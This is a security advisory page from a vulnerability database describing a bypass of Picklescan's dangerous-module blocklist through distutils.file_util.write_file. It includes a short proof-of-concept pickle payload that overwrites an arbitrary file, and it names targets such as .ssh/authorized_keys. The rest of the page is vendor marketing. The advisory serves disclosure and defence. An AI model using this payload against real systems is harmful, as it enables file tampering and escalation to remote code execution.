Cloud Vulnerability DB
A community-led vulnerabilities database
Vulnerability DatabaseGHSA-m273-6v24-x4m4
GHSA-m273-6v24-x4m4:
Python vulnerability analysis and mitigation
Summary
Picklescan has got open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However the module distutils isnt blocked and can be used for the same purpose ie to write arbitrary files.
Details
This is another vulnerability which impacts the downstream user. By constructing a pickle that user distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.
PoC
import pickle
import distutils.file_util
class FileWriteBypass:
def __reduce__(self):
target_file = "pwned_config.env"
content = ["print('I have overwritten your config')"]
return (distutils.file_util.write_file, (target_file, content))
payload = pickle.dumps(FileWriteBypass())
with open("bypass_filewrite.pkl", "wb") as f:
f.write(payload)
print("bypass_filewrite.pkl")
To fix this just add disutil to the blacklist
Source: NVD
Related Python vulnerabilities:
Free Vulnerability Assessment
Benchmark your Cloud Security Posture
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Additional Wiz resources
Get a personalized demo
Ready to see Wiz in action?
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management